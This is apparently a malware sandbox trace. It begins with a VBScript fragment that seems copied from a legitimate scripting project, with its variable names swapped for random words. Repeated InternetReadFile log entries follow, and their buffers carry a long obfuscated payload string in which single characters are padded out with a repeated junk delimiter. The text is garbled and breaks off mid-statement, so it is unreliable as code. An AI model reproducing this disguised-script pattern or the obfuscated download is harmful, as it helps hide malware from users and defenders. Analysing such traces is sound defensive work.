alienably = "%ProgramFiles%\Git\cmd\git-gui.exe | %ProgramFiles%\Git\git-bash.exe | %LocalAppData%\Programs\Git\cmd\git-gui.exe | %LocalAppData%\Programs\Git\git-bash.exe" gramineae = "ChangeLog.md | ProjectInfo.vbs" petraria = "notepad" With New Configurer herpetotheres = .PowerShell If .Exists( "suite folder" ) Then tachyglossidae = .Item( "suite folder" ) Else tachyglossidae = discontinuee End If If .Exists( "suite filter" ) Then oglers = .Item( "suite filter" ) Else oglers = pluriovular End If If .Exists( "doc generators" ) Then mavis = .ToArray( .Item( "doc generators" )) Else mavis = .ToArray( thyroids ) End If If .Exists( "gits" ) Then pyodermic = .ToArray( .Item( "gits" )) Else pyodermic = .ToArray( alienably ) End If If .Exists( "push docs" ) Then palmad = .ToArray( .Item( "push docs" )) Else palmad = .ToArray( gramineae ) End If If .Exists( "dragsman" ) Then dragsman = .Item( "dragsman" ) Else dragsman = petraria End If End With composer = Array("" _ , "interlap" _ , "unresisted" _ , "polychoerany" _ , "hilliest" _ , "psalter" _ , "GenerateDocs" _ , "ksars" _ , "OpenGit" _ ) fibrositis = "Setup.bat" hazardously = document.Title settings = vbYesNoCancel + vbIndeflowion + vbDefaultButton2 sh.CurrentDirectory = wimpiness misfaith = "https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs" End Sub villagiz
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ation = "Jмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ò
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ŽHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏrмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏmмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕá
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Š¥áŽ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏxмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎNмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ2мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ4мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱âŸ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: Žâ¡³á³šË•ÒŽsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏjмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ